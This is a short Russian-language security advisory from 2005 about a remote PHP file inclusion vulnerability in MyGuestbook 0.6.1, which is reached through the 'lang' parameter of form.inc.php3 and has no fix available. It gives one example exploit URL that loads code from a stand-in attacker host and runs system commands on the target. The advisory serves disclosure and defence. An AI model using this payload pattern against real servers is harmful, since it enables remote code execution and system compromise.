PHP инклюдинг в Mark Kronsbein's MyGuestbook

Дата публикации:
07.07.2005
Всего просмотров:
1186
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Mark Kronsbein MyGuestbook 0.x
Уязвимые версии: Mark Kronsbein's MyGuestbook 0.6.1

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.

Уязвимость существует из-за недостаточной обработки входных данных в параметре lang сценария 'form.inc.php3'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web севера. Пример:

http://[target]/gb/form.inc.php3?lang=http://
[attacker]/cmd.gif?&cmd=id;uname%20-a;uptime

URL производителя: html-design.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: MyGuestbook Remote File Inclusion

или введите имя

CAPTCHA